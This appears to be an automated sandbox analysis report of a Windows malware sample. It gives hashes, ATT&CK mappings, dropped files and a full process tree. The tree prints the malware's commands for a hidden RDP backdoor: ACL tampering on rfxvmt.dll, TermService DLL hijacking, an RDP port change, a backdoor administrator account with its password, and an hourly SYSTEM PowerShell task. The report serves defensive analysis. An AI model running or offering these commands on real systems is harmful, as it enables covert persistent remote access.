dd3edd0a584fff1f7eadd86f868eeda95f05138caf70c5ba8d807af2f8390887

Analysis

max time kernel
133s
max time network
124s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
23-05-2024 02:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

69669d80ee67ca88c2c636c5f4e567ac_JaffaCakes118.exe
Size

2.9MB
MD5

69669d80ee67ca88c2c636c5f4e567ac
SHA1

7854501a76d59ad31844330782db017b2d8ea8a5
SHA256

dd3edd0a584fff1f7eadd86f868eeda95f05138caf70c5ba8d807af2f8390887
SHA512

024a27a001c18276c7e6863119d3fbe72eb7157be9142bca5e1b058e52abf61648251896460a1c43ac02a8bf790201a1ed770ae37b2d20e4e2f01f7d9319bf4c
SSDEEP

49152:17HeAMVNwP8ne1BSGMrrBB1ZTH8QNPf199bs5FCIrMAZJln19Ot6kza3zwj:17HeVLugBB1ZTH8iHZ2CIrMWJb9Lw

Score

9^/10

discovery execution exploit persistence upx

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exe

pid process

2464 icacls.exe
2476 icacls.exe
1984 icacls.exe
2944 icacls.exe
2896 icacls.exe
2036 icacls.exe
1640 icacls.exe
2420 takeown.exe

pid	process
2464	icacls.exe
2476	icacls.exe
1984	icacls.exe
2944	icacls.exe
2896	icacls.exe
2036	icacls.exe
1640	icacls.exe
2420	takeown.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "%SystemRoot%\\help\\tmp5211.dat"	reg.exe

Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

2596 powershell.exe
Loads dropped DLL 3 IoCs

Processes:

69669d80ee67ca88c2c636c5f4e567ac_JaffaCakes118.exe

pid process

2092 69669d80ee67ca88c2c636c5f4e567ac_JaffaCakes118.exe
2748
2748
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exe

pid process

1984 icacls.exe
2944 icacls.exe
2896 icacls.exe
2036 icacls.exe
1640 icacls.exe
2420 takeown.exe
2464 icacls.exe
2476 icacls.exe

pid	process
2596	powershell.exe

pid	process
2092	69669d80ee67ca88c2c636c5f4e567ac_JaffaCakes118.exe
2748
2748

pid	process
1984	icacls.exe
2944	icacls.exe
2896	icacls.exe
2036	icacls.exe
1640	icacls.exe
2420	takeown.exe
2464	icacls.exe
2476	icacls.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Help\tmp5212.dat	upx

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 3 IoCs

Processes:

powershell.exe

description	ioc	process
File created	C:\Windows\help\tmp5211.dat	powershell.exe
File created	C:\Windows\help\tmp5212.dat	powershell.exe
File created	C:\Windows\help\tmp5213.dat	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2596 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

2256 schtasks.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2468 reg.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exe

pid process

2596 powershell.exe
2596 powershell.exe
2596 powershell.exe
2596 powershell.exe
Suspicious behavior: LoadsDriver 5 IoCs

Processes:

pid process

2748
2748
2748
2748
2748
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exeicacls.exe

description pid process

Token: SeDebugPrivilege 2596 powershell.exe
Token: SeRestorePrivilege 2476 icacls.exe

pid	process
2596	powershell.exe

pid	process
2256	schtasks.exe

pid	process
2468	reg.exe

pid	process
2596	powershell.exe
2596	powershell.exe
2596	powershell.exe
2596	powershell.exe

pid	process
2748
2748
2748
2748
2748

description	pid	process
Token: SeDebugPrivilege	2596	powershell.exe
Token: SeRestorePrivilege	2476	icacls.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

69669d80ee67ca88c2c636c5f4e567ac_JaffaCakes118.execmd.exepowershell.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exe

description	pid	process	target process
PID 2092 wrote to memory of 3024	2092	69669d80ee67ca88c2c636c5f4e567ac_JaffaCakes118.exe	cmd.exe
PID 2092 wrote to memory of 3024	2092	69669d80ee67ca88c2c636c5f4e567ac_JaffaCakes118.exe	cmd.exe
PID 2092 wrote to memory of 3024	2092	69669d80ee67ca88c2c636c5f4e567ac_JaffaCakes118.exe	cmd.exe
PID 2092 wrote to memory of 3024	2092	69669d80ee67ca88c2c636c5f4e567ac_JaffaCakes118.exe	cmd.exe
PID 3024 wrote to memory of 2596	3024	cmd.exe	powershell.exe
PID 3024 wrote to memory of 2596	3024	cmd.exe	powershell.exe
PID 3024 wrote to memory of 2596	3024	cmd.exe	powershell.exe
PID 2596 wrote to memory of 2420	2596	powershell.exe	takeown.exe
PID 2596 wrote to memory of 2420	2596	powershell.exe	takeown.exe
PID 2596 wrote to memory of 2420	2596	powershell.exe	takeown.exe
PID 2596 wrote to memory of 2464	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 2464	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 2464	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 2476	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 2476	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 2476	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 2896	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 2896	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 2896	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 2944	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 2944	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 2944	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 1984	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 1984	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 1984	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 2036	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 2036	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 2036	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 1640	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 1640	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 1640	2596	powershell.exe	icacls.exe
PID 2596 wrote to memory of 1828	2596	powershell.exe	reg.exe
PID 2596 wrote to memory of 1828	2596	powershell.exe	reg.exe
PID 2596 wrote to memory of 1828	2596	powershell.exe	reg.exe
PID 2596 wrote to memory of 2468	2596	powershell.exe	reg.exe
PID 2596 wrote to memory of 2468	2596	powershell.exe	reg.exe
PID 2596 wrote to memory of 2468	2596	powershell.exe	reg.exe
PID 2596 wrote to memory of 2628	2596	powershell.exe	net.exe
PID 2596 wrote to memory of 2628	2596	powershell.exe	net.exe
PID 2596 wrote to memory of 2628	2596	powershell.exe	net.exe
PID 2628 wrote to memory of 2656	2628	net.exe	net1.exe
PID 2628 wrote to memory of 2656	2628	net.exe	net1.exe
PID 2628 wrote to memory of 2656	2628	net.exe	net1.exe
PID 1552 wrote to memory of 2016	1552	cmd.exe	net.exe
PID 1552 wrote to memory of 2016	1552	cmd.exe	net.exe
PID 1552 wrote to memory of 2016	1552	cmd.exe	net.exe
PID 2016 wrote to memory of 2288	2016	net.exe	net1.exe
PID 2016 wrote to memory of 2288	2016	net.exe	net1.exe
PID 2016 wrote to memory of 2288	2016	net.exe	net1.exe
PID 1636 wrote to memory of 1688	1636	cmd.exe	net.exe
PID 1636 wrote to memory of 1688	1636	cmd.exe	net.exe
PID 1636 wrote to memory of 1688	1636	cmd.exe	net.exe
PID 1688 wrote to memory of 2168	1688	net.exe	net1.exe
PID 1688 wrote to memory of 2168	1688	net.exe	net1.exe
PID 1688 wrote to memory of 2168	1688	net.exe	net1.exe
PID 1452 wrote to memory of 2440	1452	cmd.exe	net.exe
PID 1452 wrote to memory of 2440	1452	cmd.exe	net.exe
PID 1452 wrote to memory of 2440	1452	cmd.exe	net.exe
PID 2596 wrote to memory of 1384	2596	powershell.exe	cmd.exe
PID 2596 wrote to memory of 1384	2596	powershell.exe	cmd.exe
PID 2596 wrote to memory of 1384	2596	powershell.exe	cmd.exe
PID 2440 wrote to memory of 624	2440	net.exe	net1.exe
PID 2440 wrote to memory of 624	2440	net.exe	net1.exe
PID 2440 wrote to memory of 624	2440	net.exe	net1.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\69669d80ee67ca88c2c636c5f4e567ac_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\69669d80ee67ca88c2c636c5f4e567ac_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2092
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell -ExecutionPolicy Bypass -f C:\Users\Admin\AppData\Local\Temp\TWUCSTRVZCTWUCSTRVZCTWUCSTRVZC.ps1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3024
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy Bypass -f C:\Users\Admin\AppData\Local\Temp\TWUCSTRVZCTWUCSTRVZCTWUCSTRVZC.ps1
    3⤵
    - Deletes itself
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2596
  - - C:\Windows\system32\takeown.exe
      "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2420
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2464
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:2476
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2896
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2944
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1984
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2036
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:1640
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
      4⤵
      PID:1828
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\help\tmp5211.dat /f
      4⤵
      Sets DLL path for service in the registry
      Modifies registry key
      PID:2468
  - - C:\Windows\system32\net.exe
      "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2628
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        5⤵
        
        PID:2656
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
      4⤵
      PID:1384
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
      4⤵
      PID:2680

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc pxeu1x26 /add
1⤵
- Suspicious use of WriteProcessMemory
PID:1552
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc pxeu1x26 /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2016
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc pxeu1x26 /add
    3⤵
    PID:2288

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:1636
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1688
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:2168

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" BISMIZHX$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:1452
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" BISMIZHX$ /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2440
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" BISMIZHX$ /ADD
    3⤵
    PID:624

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:1564
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:856
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:3032

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc pxeu1x26
1⤵
PID:2228
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc pxeu1x26
  2⤵
  PID:2028
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc pxeu1x26
    3⤵
    PID:2496

C:\Windows\System32\cmd.exe
cmd /C schtasks /create /tn 39598 /tr "powershell -nop -ep bypass -f c:\windows\help\61739.ps1" /ru system /sc hourly /mo 1
1⤵
PID:1628
- C:\Windows\system32\schtasks.exe
  schtasks /create /tn 39598 /tr "powershell -nop -ep bypass -f c:\windows\help\61739.ps1" /ru system /sc hourly /mo 1
  2⤵
  - Creates scheduled task(s)
  PID:2256

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TWUCSTRVZCTWUCSTRVZCTWUCSTRVZC.ps1

Filesize
3.5MB

MD5
67e1452131ae07c4b67762d3c302f52b

SHA1
d6329ac864341d9dd86ff9032df8912ec8c44c8b

SHA256
6416923da618a13311012632be2aa383a711c84ee182670e663e4bd8c6464950

SHA512
013ee8398189be291970c431be6cab9597e9c3650be44c8842bafeb90e2ac84dc720daf82f24bf67bab4564272fcb34db76b352923697095f9e4b9ed2a553280

Download Submit
C:\Users\Admin\AppData\Local\Temp\changes_7521tg.txt

Filesize
84B

MD5
3b722c7e086d88cd81110d7f61c10340

SHA1
730e3e77f54d87ed14c1857046c8ff3c0f403c2e

SHA256
56fef983f81a07567578fe90977d720b2417b73588388b7f05e80a0c90dfaab1

SHA512
9df557c8b3dd5e07d008be58d969085f9f3eb46da07c6d0f26156192500f147fa70abb8826fb4b74478664e8c68a18eadbd6db9e176e433edff37d83418cb129

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\samr

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Local\Temp\nsd1324.tmp\System.dll

Filesize
11KB

MD5
fbe295e5a1acfbd0a6271898f885fe6a

SHA1
d6d205922e61635472efb13c2bb92c9ac6cb96da

SHA256
a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1

SHA512
2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

Download Submit
\Windows\Help\tmp5211.dat

Filesize
120KB

MD5
9a5f1af394cdad5ca5000dc87b664017

SHA1
97ccaa9535d3f2a0ed259e91b3bb4e7417d50863

SHA256
e004b95ba76b4fad388fad96714bf95cd6f2ce8fa3b262d63bf25749dbea8b10

SHA512
cc48689ef61b5474291f5a6ac298d30a696950acfffe8208d8965ba7e85cce96b575ebdf0b59d0b764bb35b05404c9a74434eb9b24cd244125a194a02f5dd67a

Download Submit
\Windows\Help\tmp5212.dat

Filesize
783KB

MD5
9790f9fecc9bf0b6cac0dd2ea51214b8

SHA1
257b5af37b30ee374ada8e1a7a4259c5a87503bc

SHA256
40c7851445ab77275378d31090f155d856982b0d98c5c2990fbd1b708a371d30

SHA512
c8ef15aaabea3a2abfefa3a2bee0d349740009d9f3fcd0ffe145f2004f63dfedaff177c279bba4101f2e9d86944f6b4a371bbc080fa718a28e42be7578bd3bc6

Download Submit
memory/2596-15-0x0000000001ED0000-0x0000000001ED8000-memory.dmp

Filesize
32KB

Download
memory/2596-20-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

Filesize
9.6MB

Download
memory/2596-19-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

Filesize
9.6MB

Download
memory/2596-18-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

Filesize
9.6MB

Download
memory/2596-17-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

Filesize
9.6MB

Download
memory/2596-14-0x000000001B6B0000-0x000000001B992000-memory.dmp

Filesize
2.9MB

Download
memory/2596-13-0x000007FEF5AFE000-0x000007FEF5AFF000-memory.dmp

Filesize
4KB

Download
memory/2596-33-0x000007FEF5840000-0x000007FEF61DD000-memory.dmp

Filesize
9.6MB

Download